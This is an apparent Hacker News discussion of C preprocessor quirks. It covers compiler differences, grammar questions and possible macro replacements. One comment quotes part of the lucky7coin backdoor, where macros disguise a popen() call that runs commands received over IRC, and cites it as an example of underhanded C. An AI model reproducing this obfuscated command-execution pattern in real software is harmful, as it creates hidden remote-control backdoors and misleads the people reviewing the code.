top | item 10945552

Scandalous Weird Old Things About the C Preprocessor

97 points| robertelder | 10 years ago |blog.robertelder.org

41 comments

order
[+] pjc50|10 years ago|reply
The C preprocessor is a horrendous way of doing metaprogramming that was implemented because it was relatively easy to do as a separate pass. There's a reason why very few other languages have done it this way.

A good knowledge of the preprocessor is essential for writing obfuscated and underhanded C. For example, the lucky7coin backdoor: https://github.com/alerj78/lucky7coin/issues/1 where the code

  if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
  {
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
expands to

  if (vWords[1] == "PR" "IV" "M" "SG" && vWords[3] == ":!" && vWords[0].size() > 1)
  {
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
[+] DSMan195276|10 years ago|reply
IMO, whether or not the C preprocessor is good depends on what you're trying to do and how you do it. I doubt there are any preprocessors or macro systems that can't be used to obfuscate code - That's basically the definition of what they do, modify your code before you compile it. Obviously, and strange/unexplained preprocessor usage should be examined and preferably removed.

The example you gave is not really fair though, because it seems pretty obvious to me that nobody ever looked at that code - it hardly matters they hid the backdoor in the the C pre-processor. If you take a look at the repo, it only has three commits - With the first one (https://github.com/alerj78/lucky7coin/commit/07d7e5fc53e5673...) being a supposed import of the code from the repo it used to exist in, and it's in this commit where the backdoor was inserted. The real issue is that people were running code from someone who appears to be a complete unknown, has no history for his code, and just assumed it was the same as the old code without checking.

[+] yid|10 years ago|reply
This is so absurdly simple and yet devastating. Reading some of the comments on the Github issue you posted, this stood out (I don't know anything about lucky7coin):

> So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result.

So this code was actually put into production somewhere at some point -- wow. And cursory code review and compiling from source will do absolutely nothing here.

[+] kazinator|10 years ago|reply
Even if you limit yourself to a purely textual pass, you can implement much better preprocessing.
[+] nly|10 years ago|reply
Nothing a pass through -E and clang-format wouldn't reveal.
[+] evmar|10 years ago|reply
Here's one I recently learned about:

http://reviews.llvm.org/D15866

    #define FOO
    #define BAR defined(FOO)
    #if BAR
    ...
    #else
    ...
    #endif
clang and gcc will pick the #if branch while Visual Studio will take the #else branch.
[+] rootbear|10 years ago|reply
Interesting. I don't think I ever tried to use a macro in the conditional expression of a #if, except inside a defined() or undef(). From my time on the C committee, I recall that the preprocessor was a royal pain to get right. It has it's own set of token rules that aren't the same as C itself, for example.

I am also reminded of the button I used to have that said, "Defining define is undefined."

[+] random_upvoter|10 years ago|reply
There are quite a few differences between msvc and the other compilers. For instance:

  #define a(x,y) x+y
  void f(int i)
  {
      a(i,+);
  }
will compile without errors with cl but not with any other compiler.
[+] nkurz|10 years ago|reply
This doesn't seem quite right. Did you maybe mean "#undefine FOO" or "! defined(FOO)"? Whether BAR gets expanded or not, in your example it looks like it would always evaluate true. Or am I misunderstanding the ambiguity?

It might be telling that I also don't understand the Clang bug report as written. I think there are typos in the examples. Is the switch from "HAVE_FOO_BAR" to "HAVE_FOO" in the first example intentional? Is the construct "#defined" (with a final 'd') intentional in the second?

[+] cyphar|10 years ago|reply
That just looks like a Visual Studio bug to me.
[+] speeder|10 years ago|reply
STTLPORT (4.6 at least... don't checked 5.x) has lots, lots of these... I wonder how it don't crap out completely O.o
[+] colanderman|10 years ago|reply
#2 is incorrect. Being sensitive to line breaks does not make a grammar context-sensitive. It just means you have to treat line breaks as tokens rather than ignorable whitespace (which is exactly what the context-free grammar given in the C11 standard does).

Same with the bit about concatenating tokens. Every single one of those examples has a static parse tree, which, for the C preprocessor, is a sequence of tokens and directives. The author seems to be confusing the preprocessor's parse tree with the effect it has on the underlying text.

(Yes, the output of the preprocessor is dependent on what you define, but that has nothing to do with the grammar. What the author claims is like saying a Lisp is context-sensitive because the factorial function produces a different values for different inputs!)

Now, if you could do this:

    #define foobar define
    #foobar x 123
    x
and get "123", that would be a context-sensitive grammar. But that is NOT a thing you can do!
[+] breadbox|10 years ago|reply
I hate to say it, but I was rather unimpressed by this list, and nothing in it surprised me. While I certainly agree that the C preprocessor is a relic, and has not weathered the test of time well, I would suggest that a number of the supposed infelicities mentioned in this article stem from the misleading idea that the preprocessor is an integral part of the C language proper, when it is better thought of as its own language (and one that was traditionally done by a completely separate program). The preprocessor does things differently than the rest of C, because it's not C. It is a text-processing language of convenience, provided specifically for doing things that C itself cannot (or should not) do.
[+] pklausler|10 years ago|reply
I've written a C preprocessor and I agree that the language standard documents are ambiguous and incomplete. The best I could do was hack on it until it matched GCC's preprocessor well enough to compile Linux.

I don't recall all the horrid details, but one case that I do remember driving me nuts was the use of #if/#endif in the argument to a function-like macro.

[+] DubiousPusher|10 years ago|reply
Has there been any notion of a replacement Meta/Macro language for C? Something open source. Of course pre-preprocessing one's files and the complexity that might add to the build system are unattractive but I'd still be interested if someone has attacked this problem.
[+] ArkyBeagle|10 years ago|reply
Much of what makes 'C' annoying can be made less painful by referring to static/const struct tables/arrays. Those are a prime candidate for generation.

You don't have to keep the preprocessing of files as part of the mainline build, but there's something to be said for it - sort of "make GENERATE_ALL_THE_THINGS" might run the preprocessing { Python/Tcl/Perl/bash/even 'C' } scripts for you.

If the generators just emit .h files, that can be pretty good. You're still left with something #ifdef-ey to select them, based on #defines or -D options.

You might even go so far as to dynamically load these tables if that can make sense. The ld linker can directly link in blobs.

[+] pcwalton|10 years ago|reply
The module and template features (along with static if, if the committees figure out what to do in that area) in the newest versions of C++ together get pretty close to replacing the C preprocessor.
[+] ctstover|10 years ago|reply
My school of thought would be to limit it to just #include, #if, #else, #end, and non-recursive single word only #define / #undef. Force everything to be 1 per single line, and call it a day.

Macros should always be the absolute last resort to doing anything. Stepping through code in gdb with some "creative" macro-based API is almost as bad as C++.

[+] cyphar|10 years ago|reply
I'm 95% sure the last example in #3 is undefined behaviour. #(a b c) is not valid, so evaluating it with multiple levels of indirection probably is a compiler bug for not erroring out.
[+] cyphar|10 years ago|reply
And the last 3 or 4 are odd, but are required for some of the hacks required in the early days of C (and some are almost certainly used in the Linux kernel source today).
[+] biot|10 years ago|reply
Kind of click-baity, no? Though the title is missing "You won't believe what happens next... developers hate it!"